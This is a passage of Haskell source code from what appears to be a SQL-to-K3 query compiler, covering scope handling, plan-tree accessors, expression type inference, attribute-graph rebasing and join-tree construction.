| all (\path -> length path == 1) ord = return (Map.filterWithKey (\path _ -> length path == 1) fr, ord, [])
| otherwise = throwE "Unable to extract unqualified scope (lossy order specification)"
qualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
qualifiedScopeFrame (fr, _, q) = return (Map.filterWithKey (\path _ -> length path > 1) fr, [], q)
renameScopeFrame :: Identifier -> ScopeFrame -> SQLParseM ScopeFrame
renameScopeFrame i sf = do
(ufr, ord, _) <- unqualifiedScopeFrame sf
return (ufr <> Map.mapKeys (\path -> [i] ++ path) ufr, ord, [[i]])
concatScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
concatScopeFrames (lfr,lord,lq) (rfr,rord,rq) = return (lfr <> rfr, lord ++ rord, lq++rq)
mergeScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
mergeScopeFrames lsf@(_, lord, lquals) rsf@(_, rord, rquals) = do
let common = lord `intersect` rord
let nord = (nub $ lord ++ rord) \\ common
((lu,lq), (ru,rq)) <- (,) <$> partitionAttrEnv lsf <*> partitionAttrEnv rsf
let nu = (foldl (flip Map.delete) lu common) <> (foldl (flip Map.delete) ru common)
return (nu <> lq <> rq, nord, lquals ++ rquals)
mergeScopes :: ScopeId -> ScopeId -> SQLParseM ScopeId
mergeScopes id1 id2 = do
(lsf, rsf) <- (,) <$> sqclkupM id1 <*> sqclkupM id2
nsf <- mergeScopeFrames lsf rsf
sqcpushM nsf
outputTypeAndQualifier :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM (K3 Type, Maybe Identifier)
outputTypeAndQualifier t pfx alOpt = do
sym <- sasextM
case alOpt of
Nothing -> return (t, Just $ pfx ++ show sym)
Just al -> (,) <$> taliascolM al t <*> return (sqltablealias (pfx ++ show sym) al)
typedOutputScope :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
typedOutputScope t pfx alOpt = do
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextSchemaM tid rt
outputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
outputScope sid pfx alOpt = do
t <- scopeType sid
typedOutputScope t pfx alOpt
aliasedOutputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
aliasedOutputScope sid pfx alOpt = do
(t, ptrs) <- (,) <$> scopeType sid <*> sqcfptrsM sid
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextAliasM tid rt ptrs
exprOutputScope :: ScopeId -> Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
exprOutputScope sid pfx exprs = do
sym <- sasextM
let qual = Just $ pfx ++ show sym
sqgextExprM sid qual exprs
{- Binding map helpers. -}
bmelem :: BindingMap
bmelem = BMTPrefix "elem"
{- Query plan accessors. -}
ttag :: PlanTree -> PlanNode
ttag (Node tg _) = tg
replaceData :: Tree a -> a -> Tree a
replaceData (Node _ ch) n = Node n ch
isEquiJoin :: PlanTree -> Bool
isEquiJoin (ttag -> PJoin _ _ _ (_:_) [] _ _) = True
isEquiJoin _ = False
isJoin :: PlanTree -> Bool
isJoin (ttag -> PJoin _ _ _ _ _ _ _) = True
isJoin _ = False
{- Path/chain accessors. -}
trypath :: Maybe ScopeId -> SQLParseM a -> (ADGPtr -> SQLParseM a) -> AttrPath -> SQLParseM a
trypath sidOpt rfail rsuccess path = (\f -> maybe rfail f sidOpt) $ \sid -> do
pOpt <- sqcftrylkupM sid path
maybe rfail rsuccess pOpt
isAggregatePath :: PlanCPath -> Bool
isAggregatePath (PlanCPath _ _ [] [] _ _ _) = True
isAggregatePath _ = False
isGroupByAggregatePath :: PlanCPath -> Bool
isGroupByAggregatePath (PlanCPath _ _ (_:_) _ (_:_) _ _) = True
isGroupByAggregatePath _ = False
isNonAggregatePath :: PlanCPath -> Bool
isNonAggregatePath (PlanCPath _ _ [] _ [] Nothing _) = True
isNonAggregatePath _ = False
planNodeChains :: PlanNode -> Maybe [PlanCPath]
planNodeChains (PJoin _ _ _ _ _ _ chains) = Just chains
planNodeChains (PTable _ _ _ _ chains) = Just chains
planNodeChains (PSubquery _ qcl) = queryClosureChains qcl
treeChains :: PlanTree -> Maybe [PlanCPath]
treeChains (Node n _) = planNodeChains n
queryPlanChains :: QueryPlan -> Maybe [PlanCPath]
queryPlanChains (QueryPlan tOpt chains _) = if null chains then maybe Nothing treeChains tOpt else Just chains
queryClosureChains :: QueryClosure -> Maybe [PlanCPath]
queryClosureChains (QueryClosure _ plan) = queryPlanChains plan
pcext :: PlanCPath -> PlanTree -> SQLParseM PlanTree
pcext p (Node n ch) = case n of
PJoin psid osid jt jeq jp jpb chains -> return $ Node (PJoin psid osid jt jeq jp jpb $ chains ++ [p]) ch
PTable i tsid trOpt bmOpt chains -> return $ Node (PTable i tsid trOpt bmOpt $ chains ++ [p]) ch
PSubquery osid qcl -> pcextclosure p qcl >>= \nqcl -> return $ Node (PSubquery osid nqcl) ch
where pcextclosure p (QueryClosure fvs plan) = pcextplan p plan >>= \nplan -> return $ QueryClosure fvs nplan
pcextplan p (QueryPlan tOpt chains stgOpt) = return $ QueryPlan tOpt (chains ++ [p]) stgOpt
pcextSelect :: ScopeId -> SubqueryBindings -> ScalarExpr -> [PlanCPath] -> [PlanCPath]
pcextSelect sid qbs p [] = [PlanCPath sid [p] [] [] [] Nothing qbs]
pcextSelect _ qbs p pcl@(last -> c) = init pcl ++ [c {pcselects = pcselects c ++ [p], pcbindings = pcbindings c ++ qbs}]
pcextGroupBy :: SelectItemList -> SelectItemList -> PlanNode -> SQLParseM PlanNode
pcextGroupBy gbs aggs n@(PJoin _ osid _ _ _ _ chains) = do
aggsid <- aggregateSchema (Just $ chainSchema osid chains) gbs aggs
return $ n { pnjpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PTable _ sid _ _ chains) = do
aggsid <- aggregateSchema (Just $ chainSchema sid chains) gbs aggs
return $ n { pntpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PSubquery _ qcl) = extPlan (qcplan qcl) >>= \p -> return $ n { pnqclosure = qcl { qcplan = p } }
where extPlan p@(QueryPlan tOpt chains stgOpt) = do
sid <- planSchema p
aggsid <- aggregateSchema (Just sid) gbs aggs
return $ QueryPlan tOpt (chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []]) stgOpt
pcNonAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcNonAggExprs _ [] = []
pcNonAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
extract sid' (PlanCPath _ selects groupbys projects _ _ _) = (sid', selects ++ groupbys ++ projectionexprs projects)
pcAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcAggExprs _ [] = []
pcAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
extract sid' (PlanCPath _ _ _ _ aggs _ _) = (sid', projectionexprs aggs)
chainSchema :: ScopeId -> [PlanCPath] -> ScopeId
chainSchema sid chains = if null chains then sid else pcoutsid $ last chains
treeSchema :: PlanTree -> SQLParseM ScopeId
treeSchema (ttag -> PJoin _ sid _ _ _ _ chains) = return $ chainSchema sid chains
treeSchema (ttag -> PSubquery sid _) = return sid
treeSchema (ttag -> PTable _ sid _ _ chains) = return $ chainSchema sid chains
treeSchema _ = throwE "Invalid plan node input for treeSchema"
planSchema :: QueryPlan -> SQLParseM ScopeId
planSchema (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
planSchema (QueryPlan (Just t) [] _) = treeSchema t
planSchema (QueryPlan _ chains _) = return $ pcoutsid $ last chains
aggregateSchema :: Maybe ScopeId -> SelectItemList -> SelectItemList -> SQLParseM ScopeId
aggregateSchema (Just sid) [] [] = return sid
aggregateSchema sidOpt projects aggregates = do
let pexprs = projectionexprs projects
let aexprs = projectionexprs aggregates
(prji, prjids) <- foldM selectItemIdAcc (0, []) projects
(_, aggids) <- foldM selectItemIdAcc (prji, []) aggregates
prjt <- mapM (scalarexprType sidOpt) pexprs
aggt <- mapM (aggregateType sidOpt) aexprs
case sidOpt of
Nothing -> typedOutputScope (recT $ zip prjids prjt ++ zip aggids aggt) "__RN" Nothing
Just sid -> exprOutputScope sid "__AGG" $ (zip3 prjids prjt pexprs) ++ (zip3 aggids aggt aexprs)
refreshInputSchema :: PlanNode -> [PlanTree] -> SQLParseM PlanNode
refreshInputSchema (PJoin _ _ jt jeq jp jpb chains) [l,r] = do
(lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
jpsid <- mergeScopes lsid rsid
josid <- outputScope jpsid "__JR" Nothing
return $ PJoin jpsid josid jt jeq jp jpb chains
refreshInputSchema n [] = return n
refreshInputSchema _ _ = throwE "Invalid plan tree node for refreshInputSchema"
scopeType :: ScopeId -> SQLParseM (K3 Type)
scopeType sid = do
sf@(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
ptrs <- mapM (\path -> liftExceptM $ sflkup sf path) ord
nodes <- mapM sqglkupM ptrs
tcolM $ recT $ map (adnn &&& adnt) nodes
k3ScopeType :: ScopeId -> BindingMap -> SQLParseM (K3 Type)
k3ScopeType sid bm = do
t <- scopeType sid
rt <- telemM t
case (tnc rt, bm) of
((TRecord ids, ch), BMNone) -> return t
((TRecord ids, ch), BMTPrefix j) -> tcolM $ recT [(j,rt)]
((TRecord ids, ch), BMTFieldMap fb) -> namedRecordT fb (zip ids ch) >>= tcolM
((TRecord ids, ch), BMTVPartition pb) -> throwE "BMTVPartition mapping unsupported in k3ScopeType"
_ -> throwE "Invalid k3ScopeType element type"
where
namedRecordT fb idt = foldM (field fb) [] idt >>= return . recT
field fb acc (j,t) = maybe (err j) (extendNestedRecord t acc) $ Map.lookup j fb
extendNestedRecord _ fieldsAcc [] = throwE "Invalid nested record extension"
extendNestedRecord t fieldsAcc [i] = return $ fieldsAcc ++ [(i,t)]
extendNestedRecord t fieldsAcc (h:rest) =
case lookup h fieldsAcc of
Nothing -> do
subfields <- extendNestedRecord t [] rest
return $ fieldsAcc ++ [(h, recT subfields)]
Just (tnc -> (TRecord ids, tch)) -> do
subfields <- extendNestedRecord t (zip ids tch) rest
return $ map (replaceField h $ recT subfields) fieldsAcc
Just _ -> throwE $ "Existing non-record field when attempting to extend nested record"
replaceField dst nt (src,t) | src == dst = (dst, nt)
| otherwise = (src, t)
err j = throwE $ "No field binding found in namedRecordT for " ++ show j
k3PlanType :: BindingMap -> QueryPlan -> SQLParseM (K3 Type)
k3PlanType _ (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
k3PlanType bm p = do
sid <- planSchema p
case queryPlanChains p of
Just [] -> k3ScopeType sid bm
Just l | isAggregatePath (last l) -> do
t <- k3ScopeType sid bm
rt <- telemM t
case tnc rt of
(TRecord ids, ch) -> zeroT $ zip ids ch
_ -> throwE "Invalid k3 aggregate plan type"
_ -> k3ScopeType sid bm
-- TODO:
-- i. builtin function types
ii . AST : AggregateFn , Extract , Interval , LiftOperator , NullLit , Placeholder , PositionalArg , WindowFn
scalarexprType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
scalarexprType _ (BooleanLit _ _) = return TC.bool
scalarexprType _ (StringLit _ _) = return TC.string
scalarexprType _ (NumberLit _ i) = return $ if "." `isInfixOf` i then TC.real else TC.int
scalarexprType _ (TypedStringLit _ tn _) = sqlnamedtype tn
scalarexprType _ (Cast _ _ tn) = sqlnamedtype tn
scalarexprType sidOpt (Identifier _ (sqlnmcomponent -> i)) = do
sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
trypath sidOpt (trace (unwords ["bottom", i, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) [i]
scalarexprType sidOpt (QIdentifier _ (sqlnmpath -> path)) = do
sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
trypath sidOpt (trace (unwords ["bottom", show path, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) path
scalarexprType sidOpt (Case _ whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (CaseSimple _ expr whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (FunCall _ nm args) = do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp _ x)) -> scalarexprType sidOpt x
(Just (BinaryOp _ x y)) -> do
xt <- scalarexprType sidOpt x
yt <- scalarexprType sidOpt y
if xt == yt then return xt
else throwE $ boxToString $ ["Binary operator sql type mismatch"]
%$ prettyLines xt %$ prettyLines yt
_ -> do
case (fn, args) of
("!between", [_,_,_]) -> return TC.bool
("!like", [_,_]) -> return TC.bool
("!notlike", [_,_]) -> return TC.bool
(_, _) -> throwE $ "Unsupported function in scalarexprType: " ++ fn
scalarexprType (Just sid) (Star _) = scopeType sid >>= telemM
scalarexprType (Just sid) (QStar _ (sqlnmcomponent -> n)) = do
(fr,_,_) <- sqclkupM sid
let ptrs = Map.elems $ Map.filterWithKey (\k _ -> [n] `isPrefixOf` k) fr
idt <- mapM (\p -> sqglkupM p >>= return . (adnn &&& adnt)) ptrs
return $ recT idt
scalarexprType _ (ScalarSubQuery _ _) = return TC.bool -- TODO: return subquery type, not bool!
scalarexprType _ (Exists _ _) = return TC.bool
scalarexprType _ (InPredicate _ _ _ _) = return TC.bool
scalarexprType _ e = throwE $ "Type inference unsupported for: " ++ show e
caselistType :: Maybe ScopeId -> [([ScalarExpr], ScalarExpr)] -> SQLParseM (K3 Type)
caselistType _ [] = throwE $ "Invalid empty case-list in caselistType"
caselistType sidOpt ((_,e):_) = scalarexprType sidOpt e
aggregateType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
aggregateType sidOpt agg@(FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("sum" , [e]) -> scalarexprType sidOpt e
("count", [e]) -> return $ TC.int
("min" , [e]) -> scalarexprType sidOpt e
("max" , [e]) -> scalarexprType sidOpt e
(_, _) -> throwE $ "Invalid aggregate expression: " ++ show agg
aggregateType _ agg = throwE $ "Invalid aggregate expression: " ++ show agg
selectItemId :: Int -> SelectItem -> SQLParseM (Int, Identifier)
selectItemId i (SelExp _ (Identifier _ (Nmc n))) = return (i, n)
selectItemId i (SelExp _ _) = return (i+1, "f" ++ show i)
selectItemId i (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, n)
selectItemIdAcc :: (Int, [Identifier]) -> SelectItem -> SQLParseM (Int, [Identifier])
selectItemIdAcc (i, acc) (SelExp _ (Identifier _ (Nmc n))) = return (i, acc ++ [n])
selectItemIdAcc (i, acc) (SelExp _ _) = return (i+1, acc ++ ["f" ++ show i])
selectItemIdAcc (i, acc) (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, acc ++ [n])
nodeBindingMap :: PlanNode -> SQLParseM BindingMap
nodeBindingMap (PJoin _ _ _ _ _ _ _) = return bmelem
nodeBindingMap _ = return BMNone
chainBindingMap :: PlanCPath -> SQLParseM BindingMap
chainBindingMap (PlanCPath _ _ gbs prjs aggs _ _)
| null gbs && null aggs = return bmelem
| otherwise = do
(prji, prjids) <- foldM selectItemIdAcc (0, []) prjs
(_, aggids) <- foldM selectItemIdAcc (prji, []) aggs
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" prjids
let (_, valPaths) = prefixTypePath nidx "value" aggids
return $ BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
where prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
treeBindingMap :: PlanTree -> SQLParseM BindingMap
treeBindingMap t = case treeChains t of
Nothing -> nodeBindingMap $ ttag t
Just [] -> nodeBindingMap $ ttag t
Just l -> chainBindingMap $ last l
planBindingMap :: QueryPlan -> SQLParseM BindingMap
planBindingMap (QueryPlan Nothing chains _)
| null chains = throwE "Invalid query plan with empty tree and chains"
| otherwise = chainBindingMap $ last chains
planBindingMap (QueryPlan (Just t) chains _)
| null chains = treeBindingMap t
| otherwise = chainBindingMap $ last chains
keyValuePrefix :: TypePath -> Bool
keyValuePrefix tp = ["key"] `isPrefixOf` tp || ["value"] `isPrefixOf` tp
keyValueMapping :: TypeMapping -> Bool
keyValueMapping tm = maybe False (either (\pfx -> pfx `elem` ["key", "value"]) keyValuePrefix) tm
isKVBindingMap :: BindingMap -> SQLParseM Bool
isKVBindingMap (BMTFieldMap fields) = return $ Map.foldl (\acc tp -> acc && keyValuePrefix tp) True fields
isKVBindingMap (BMTVPartition partitions) = return $ Map.foldl (\acc (_,tm) -> acc && keyValueMapping tm) True partitions
isKVBindingMap _ = return False
{- Rewriting helpers. -}
-- TODO: case, etc.
-- This function does not descend into subqueries.
-- However, it should include free variables present in the subquery, and defined in
-- the given scope.
exprAttrs :: ScopeId -> ScalarExpr -> SQLParseM [ADGPtr]
exprAttrs sid e = case e of
(Identifier _ (sqlnmcomponent -> i)) -> sqcflkupM sid [i] >>= return . (:[])
(QIdentifier _ (sqlnmpath -> path)) -> sqcflkupM sid path >>= return . (:[])
(FunCall _ _ args) -> mapM (exprAttrs sid) args >>= return . concat
_ -> return []
-- | Returns pointers bound in a scope frame.
attrEnvPtrs :: ScopeFrame -> [ADGPtr]
attrEnvPtrs (fr, _, _) = nub $ Map.elems fr
-- | Chases a given attribute pointer to the provided roots (or its set of source nodes if
-- no roots are given).
adgchaseM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseM roots ptr = sqglkupM ptr >>= \n -> chase [] ptr n
where chase path p n
| p `elem` path || p `elem` roots = return [(p, n)]
| null (adnch n) = return [(p, n)]
| otherwise = mapM (\c -> sqglkupM c >>= chase (path ++ [p]) c) (adnch n) >>= return . concat
adgchaseExprM :: [ADGPtr] -> ScopeId -> ScalarExpr -> SQLParseM ScalarExpr
adgchaseExprM roots sid expression = exprAttrs sid expression >>= \ptrs -> chase [] expression ptrs
where chase path e ptrs = do
let remptrs = filter (\p -> p `notElem` roots && p `notElem` path) ptrs
if null remptrs
then return e
else do
nodes <- mapM sqglkupM remptrs
let env = concatMap (\(i,eOpt) -> maybe [] (\e' -> [(i,e')]) eOpt) $ map (adnn &&& adne) nodes
ne <- substituteExpr env e
chase (path ++ remptrs) ne $ concatMap adnch nodes
-- | Returns a set of nodes visited during a chase on a given list of roots and a starting pointer.
adgchaseNodesM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseNodesM roots ptr = sqglkupM ptr >>= \node -> chase [(ptr,node)] [] ptr node
where chase acc path p n
| p `elem` path || p `elem` roots || null (adnch n) = return acc
| otherwise = foldM (rcr p path) acc (adnch n)
rcr p path acc cp = sqglkupM cp >>= \cn -> chase (acc ++ [(cp,cn)]) (path ++ [p]) cp cn
baseRelationsP :: ADGPtr -> SQLParseM [Identifier]
baseRelationsP ptr = adgchaseM [] ptr >>= return . nub . catMaybes . map (adnr . snd)
baseRelationsE :: ScopeId -> ScalarExpr -> SQLParseM [Identifier]
baseRelationsE sid expression = do
ptrs <- exprAttrs sid expression
mapM (adgchaseM []) ptrs >>= return . nub . catMaybes . map (adnr . snd) . concat
baseRelationsS :: ScopeId -> SQLParseM [Identifier]
baseRelationsS sid = do
ptrs <- sqcfptrsM sid
mapM (adgchaseM []) ptrs >>= return . nub . catMaybes . map (adnr . snd) . concat
rebaseAttrsToRoots :: [ADGPtr] -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrsToRoots roots ptrs = mapM (adgchaseM roots) ptrs >>= return . nub . map fst . concat
rebaseAttrs :: ScopeId -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrs sid ptrs = sqclkupM sid >>= \fr -> rebaseAttrsToRoots (attrEnvPtrs fr) ptrs
rebaseExprsToRoots :: ScopeId -> [ADGPtr] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprsToRoots sid roots exprs = mapM (adgchaseExprM roots sid) exprs
rebaseExprs :: ScopeId -> [ScopeId] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprs ssid dsidl exprs = do
frs <- mapM sqclkupM dsidl
let ptrs = nub $ concatMap attrEnvPtrs frs
rebaseExprsToRoots ssid ptrs exprs
rebaseSelectItemsToRoots :: ScopeId -> [ADGPtr] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItemsToRoots ssid roots items = mapM rebase items
where rebase (SelExp ann e) = adgchaseExprM roots ssid e >>= \ne -> return (SelExp ann ne)
rebase (SelectItem ann e nmc) = adgchaseExprM roots ssid e >>= \ne -> return (SelectItem ann ne nmc)
rebaseSelectItems :: ScopeId -> [ScopeId] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItems ssid dsidl items = do
frs <- mapM sqclkupM dsidl
let ptrs = nub $ concatMap attrEnvPtrs frs
rebaseSelectItemsToRoots ssid ptrs items
localizeInputExprs :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM (ScalarExprList, ScalarExprList, ScalarExprList)
localizeInputExprs sid lsid rsid exprs = do
[lfr, rfr] <- mapM sqclkupM [lsid, rsid]
let (lroots, rroots) = (nub $ attrEnvPtrs lfr, nub $ attrEnvPtrs rfr)
foldM (localize lroots rroots $ nub $ concat [lroots, rroots]) ([], [], []) exprs
where
localize lroots rroots roots (lacc, racc, acc) e = do
eptrs <- exprAttrs sid e
reptrs <- rebaseAttrsToRoots roots eptrs
return $
if reptrs `intersect` lroots == reptrs then (lacc++[e], racc, acc)
else if reptrs `intersect` rroots == reptrs then (lacc, racc++[e], acc)
else (lacc, racc, acc++[e])
{- Optimization -}
-- TODO: query decorrelation
sqloptimize :: [Statement] -> SQLParseM [SQLDecl]
sqloptimize l = mapM stmt l
where
stmt (CreateTable _ nm attrs _) = do
t <- sqltabletype attrs
sqrextM (sqlnm nm) t
return $ SQLRel (sqlnm nm, t)
stmt (QueryStatement _ q) = do
qcl <- query q
return $ SQLQuery $ qcplan qcl
stmt s = throwE $ "Unimplemented SQL stmt: " ++ show s
-- TODO: distinct, order, limit, offset
query (Select _ _ selectL tableL whereE gbL havingE _ _ _) = queryPlan selectL tableL whereE gbL havingE
query q = throwE $ "Unhandled query " ++ show q
-- TODO: simplify chains with join tree before adding to top-level plan.
queryPlan selectL tableL whereE gbL havingE = do
tfvOpt <- joinTree tableL
case tfvOpt of
Nothing -> do
(prjs, aggs, gsid) <- aggregatePath Nothing selectL
(efvs, subqs) <- varsAndQueries Nothing $ projectionexprs $ prjs ++ aggs
return $ QueryClosure efvs $ QueryPlan Nothing [PlanCPath gsid [] [] prjs aggs Nothing subqs] Nothing
Just (t, fvs) -> do
sid <- treeSchema t
conjuncts <- maybe (return []) splitConjuncts whereE
(nt, remconjuncts) <- predicatePushdown (Just sid) conjuncts t
(prjs, aggs, gsid) <- aggregatePath (Just sid) selectL
if all null [remconjuncts, gbL, projectionexprs prjs, projectionexprs aggs]
then return $ QueryClosure fvs $ QueryPlan (Just nt) [] Nothing
else do
(gnt, naggs) <- if null gbL then return (nt, aggs) else groupByPushdown nt sid (map mkprojection gbL) aggs
(efvs, subqs) <- debugGBPushdown gnt
$ varsAndQueries (Just sid) $ remconjuncts ++ gbL ++ (projectionexprs $ prjs ++ naggs)
(hfvs, hsubqs) <- maybe (return ([], [])) (\e -> varsAndQueries (Just gsid) [e]) havingE
let chains = [PlanCPath gsid remconjuncts gbL prjs naggs havingE $ subqs ++ hsubqs]
return $ QueryClosure (nub $ fvs ++ efvs ++ hfvs) $ QueryPlan (Just gnt) chains Nothing
debugGBPushdown x y = if False then y else trace (boxToString $ ["GB pushdown result"] %$ prettyLines x) y
joinTree [] = return Nothing
joinTree (h:t) = do
n <- unaryNode h
(tree, tfvs) <- foldM binaryNode n t
return $ Just (tree, tfvs)
binaryNode (lhs, lfvs) n = do
(rhs, rfvs) <- unaryNode n
(lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
jpsid <- mergeScopes lsid rsid
josid <- aliasedOutputScope jpsid "__CP" Nothing
return (Node (PJoin jpsid josid Nothing [] [] [] []) [lhs, rhs], nub $ lfvs ++ rfvs)
unaryNode n@(Tref _ nm al) = do
let tid = sqltablealias ("__" ++ sqlnm nm) al
t <- sqrlkupM $ sqlnm nm
rt <- taliascolM al t
tsid <- sqgextSchemaM tid rt
return (Node (PTable (sqlnm nm) tsid (Just n) Nothing []) [], [])
unaryNode (SubTref _ q al) = do
qcl <- query q
nqsid <- planSchema $ qcplan qcl
qalsid <- outputScope nqsid "__RN" (Just al)
return (Node (PSubquery qalsid qcl) [], qcfree qcl)
unaryNode (JoinTref _ jlt nat jointy jrt onE jal) = do
(lhs, lfvs) <- unaryNode jlt
(rhs, rfvs) <- unaryNode jrt
(lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
jpsid <- mergeScopes lsid rsid
(jeq, jp, pfvs, psq) <- joinPredicate jpsid lsid rsid onE
josid <- aliasedOutputScope jpsid "__JR" (Just jal)
return (Node (PJoin jpsid josid (Just (nat,jointy)) jeq jp psq []) [lhs, rhs], nub $ lfvs ++ rfvs ++ pfvs)
unaryNode (FunTref _ _ _) = throwE "Table-valued functions are not supported"
joinPredicate :: ScopeId -> ScopeId -> ScopeId -> OnExpr -> SQLParseM ([(ScalarExpr, ScalarExpr)], ScalarExprList, [AttrPath], SubqueryBindings)
joinPredicate sid lsid rsid (Just (JoinOn _ joinE)) = do
conjuncts <- splitConjuncts joinE
(sepcons, nsepcons) <- classifyConjuncts sid lsid rsid conjuncts >>= return . partitionEithers
let (lseps, rseps) = unzip sepcons
(lcvs, lsubqs) <- varsAndQueries (Just sid) lseps
(rcvs, rsubqs) <- varsAndQueries (Just sid) rseps
(cvs, subqs) <- varsAndQueries (Just sid) nsepcons
return (sepcons, nsepcons, nub $ lcvs ++ rcvs ++ cvs, nub $ lsubqs ++ rsubqs ++ subqs)
joinPredicate sid _ _ (Just (JoinUsing _ nmcs)) = do
(_, _, [[lqual], [rqual]]) <- sqclkupM sid
let eqs = map (\i -> (QIdentifier emptyAnnotation [Nmc lqual, i], QIdentifier emptyAnnotation [Nmc rqual, i])) nmcs
return (eqs, [], [], [])
joinPredicate _ _ _ _ = return ([], [], [], [])
splitConjuncts :: ScalarExpr -> SQLParseM ScalarExprList
splitConjuncts e@(FunCall _ nm args) = do
let fn = sqlnm nm
case (fn, args) of
("!and", [x,y]) -> (++) <$> splitConjuncts x <*> splitConjuncts y
_ -> return [e]
splitConjuncts e = return [e]
classifyConjuncts :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM [Either (ScalarExpr, ScalarExpr) ScalarExpr]
classifyConjuncts sid lsid rsid es = do
(lrels, rrels) <- (,) <$> baseRelationsS lsid <*> baseRelationsS rsid
mapM (classifyConjunct sid lsid rsid lrels rrels) es
classifyConjunct :: ScopeId -> ScopeId -> ScopeId -> [Identifier] -> [Identifier] -> ScalarExpr
-> SQLParseM (Either (ScalarExpr, ScalarExpr) ScalarExpr)
classifyConjunct sid lsid rsid lrels rrels e@(FunCall _ nm args) = do
let fn = sqlnm nm
case sqloperator fn args of
(Just (BinaryOp OEqu x y)) -> do
(xrels, yrels) <- (,) <$> baseRelationsE sid x <*> baseRelationsE sid y
classify x y xrels yrels
_ -> return $ Right e
where
classify x y (nub -> xrels) (nub -> yrels)
| xrels `intersect` lrels == xrels && yrels `intersect` rrels == yrels = do
[nx] <- rebaseExprs sid [lsid] [x]
[ny] <- rebaseExprs sid [rsid] [y]
return $ Left (x,y)
| xrels `intersect` rrels == xrels && yrels `intersect` lrels == yrels = do
[ny] <- rebaseExprs sid [lsid] [y]
[nx] <- rebaseExprs sid [rsid] [x]
return $ Left (y,x)
| otherwise = return $ Right e
classifyConjunct _ _ _ _ _ e = return $ Right e
aggregatePath :: Maybe ScopeId -> SelectList -> SQLParseM (SelectItemList, SelectItemList, ScopeId)
aggregatePath sidOpt (SelectList _ selectL) = do
(prjs, aggs) <- mapM classifySelectItem selectL >>= return . partitionEithers
asid <- aggregateSchema sidOpt prjs aggs
return (prjs, aggs, asid)
classifySelectItem :: SelectItem -> SQLParseM (Either SelectItem SelectItem)
classifySelectItem si@(SelExp _ e) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
classifySelectItem si@(SelectItem _ e _) = isAggregate e >>= \agg -> return $ if agg then Right si else Left si
TODO : AggregateFn , Interval , LiftOperator , WindowFn
varsAndQueries :: Maybe ScopeId -> ScalarExprList -> SQLParseM ([AttrPath], SubqueryBindings)
varsAndQueries sidOpt exprs = processMany exprs
where process (FunCall _ _ args) = processMany args
process (Identifier _ (sqlnmcomponent -> i)) = trypath sidOpt (return ([[i]], [])) (const $ return ([], [])) [i]
process (QIdentifier _ (sqlnmpath -> path)) = trypath sidOpt (return ([path], [])) (const $ return ([], [])) path
process (Case _ whens elseexpr) = caseList (maybe [] (:[]) elseexpr) whens
process (CaseSimple _ expr whens elseexpr) = caseList ([expr] ++ maybe [] (:[]) elseexpr) whens
process e@(Exists _ q) = bindSubquery e q
process e@(ScalarSubQuery _ q) = bindSubquery e q
process (InPredicate _ ine _ (InList _ el)) = processMany $ ine : el
